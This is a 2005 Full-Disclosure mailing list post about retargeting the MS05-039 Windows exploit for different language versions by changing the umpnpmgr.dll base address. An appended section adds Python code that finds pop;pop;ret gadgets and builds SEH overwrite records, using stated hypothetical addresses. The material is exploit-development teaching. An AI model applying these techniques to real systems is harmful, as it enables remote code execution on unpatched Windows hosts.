Subject: [Full-disclosure] Re: MS05_039 Exploitation (different languages)
Date: Fri, 26 Aug 2005 14:36:21 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Sanjay Rawat wrote:
> I too observed the same thing. I am running a Windows 2K, SP4. I found
> that the base address of UMPNPMGR.DLL is 0x767a0000. However, when I run the
> attack with this address, the target machine gets rebooted (a crash).
> This may be because umpnpmgr.dll is a part of "services.exe"; therefore,
> on failure, it reboots. But with the unchanged base address, it worked
> perfectly. So now the same code can be used for DoS also!!!

You are simply crashing the "services" process because EIP is not reaching
the right instructions (e.g. pop;pop;ret) or (depending on the process'
memory layout) it's referencing an invalid address. When Windows detects
the crash, it reboots (since it lacks an important system component).
This is a side effect. Anyway, if you have a shell, why would you want a
simple DoS? :)

In order to clarify:
- - my hacked hod's exploit changed the "destination EIP" to match Spanish
systems. So it will NOT work on English systems (call it "DoS"; I prefer
to call it "didn't work" ;-)). And that's why I appended "-spanish" to the
filename.
- - for the Metasploit module, I simply added a new "target", so it supports
both English (target 0) and Spanish (target 1). It can be directly
copied to the "exploits" directory in the Metasploit source tree. That's the
reason I didn't change the filename in this case (hdm: feel free to add it
to Metasploit).

Finally, the purpose of my post was not only to add a new target to an
exploit (the ML would quickly be flooded with tons of similar mails if
everyone did it... so please, don't do it, I'm a bad example :-(), but to
bring attention to the base address issue and try to learn from you,
guys :). Indeed, I still have some questions:
- - what is the connection between the different language versions of Windows, if there
is any? (for instance, ad@class101.org suggested that "French offsets are
like the German ones") (btw, I didn't change the offset but the base
address, which is a different thing)
- - is there any more or less accurate list of connections/links in Windows across
different languages? Or perhaps it's something fairly random?

PS: You could write directly to me and I'll summarize the responses
(different base addresses for the exploit are welcome; I don't think
it's appropriate to flood the mailing list with this...).

- --

Regards,
- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)

iD8DBQFDDwzF5H+KferVZ0IRAu65AKCQC9nsb1VjzmooamBTWKZeEUS7sgCgjTwe
BAz1iweHkMIgPq0pQaCW99s=
=4fg1
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
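The distinction Roman draws above, between the module base address (which differs per language build of umpnpmgr.dll) and the in-module offset of the pop;pop;ret gadget, is what makes adding a per-language "target" a one-line change. The following is an added example, not code from the original post or from Metasploit: it scans a constructed image buffer for pop;pop;ret sequences, computes the absolute SEH handler address as base + offset for each target, rejects candidates containing bad bytes, and packs the nSEH/SEH overwrite. The two base addresses and the image bytes are hypothetical values made up for this example; they are not the real base addresses of any Windows build.

```python
"""
Per-target SEH handler address derivation for a pop;pop;ret based exploit.

Added example; the image, the base addresses and the target names are
constructed for illustration and are NOT real umpnpmgr.dll values.
"""
import struct

# x86 encodings: "pop r32" is a single byte 0x58..0x5F, "ret" is 0xC3,
# "ret imm16" is 0xC2 followed by two immediate bytes.
POP_OPCODES = set(range(0x58, 0x60))
RET_OPCODES = (0xC2, 0xC3)

# Hypothetical per-language image bases (NOT real values): the gadget offset
# inside the DLL is assumed identical, only the load address differs.
TARGETS = {
    "English": 0x76700000,
    "Spanish": 0x76710000,
}


def build_sample_image() -> bytes:
    """Constructed stand-in for a DLL's code bytes with two gadgets planted."""
    image = bytearray(b"\x90" * 0x2000)           # NOP filler
    image[0x10:0x13] = b"\x5b\x5d\xc3"            # pop ebx; pop ebp; ret
    image[0x1234:0x1239] = b"\x58\x59\xc2\x04\x00"  # pop eax; pop ecx; ret 4
    return bytes(image)


SAMPLE_IMAGE = build_sample_image()


def find_pop_pop_ret(image: bytes) -> list:
    """Return every offset in image where a pop;pop;ret sequence starts."""
    hits = []
    for i in range(len(image) - 2):
        if (image[i] in POP_OPCODES
                and image[i + 1] in POP_OPCODES
                and image[i + 2] in RET_OPCODES):
            hits.append(i)
    return hits


def seh_handler_addr(base: int, offset: int, bad_bytes: bytes = b"\x00\x0a\x0d") -> int:
    """Absolute address for the SEH handler slot: base + offset.

    Raises ValueError if the little-endian encoding contains a bad byte,
    which would truncate or mangle the overwrite in many string-based bugs.
    """
    addr = base + offset
    packed = struct.pack("<I", addr)
    if any(b in packed for b in bad_bytes):
        raise ValueError("0x%08x contains a bad byte" % addr)
    return addr


def build_targets(image: bytes, targets: dict, bad_bytes: bytes = b"\x00\x0a\x0d") -> dict:
    """Pick, per target, the first pop;pop;ret whose absolute address is clean."""
    offsets = find_pop_pop_ret(image)
    chosen = {}
    for name, base in targets.items():
        for off in offsets:
            try:
                chosen[name] = seh_handler_addr(base, off, bad_bytes)
                break
            except ValueError:
                continue   # try the next gadget offset for this base
    return chosen


def build_seh_record(handler_addr: int) -> bytes:
    """nSEH = short jmp +6 over the handler slot (padded), SEH = gadget address."""
    nseh = b"\xeb\x06\x90\x90"
    return nseh + struct.pack("<I", handler_addr)


if __name__ == "__main__":
    for name, addr in build_targets(SAMPLE_IMAGE, TARGETS).items():
        print("%-8s handler=0x%08x record=%s" % (name, addr, build_seh_record(addr).hex()))
```

Note that the gadget at offset 0x10 is rejected for both bases because its absolute address encodes with a null byte, so each target ends up on the 0x1234 gadget; a wrong base (as in Sanjay's report) simply lands EIP on whatever bytes happen to sit at base + offset, which is the crash-and-reboot behaviour described above.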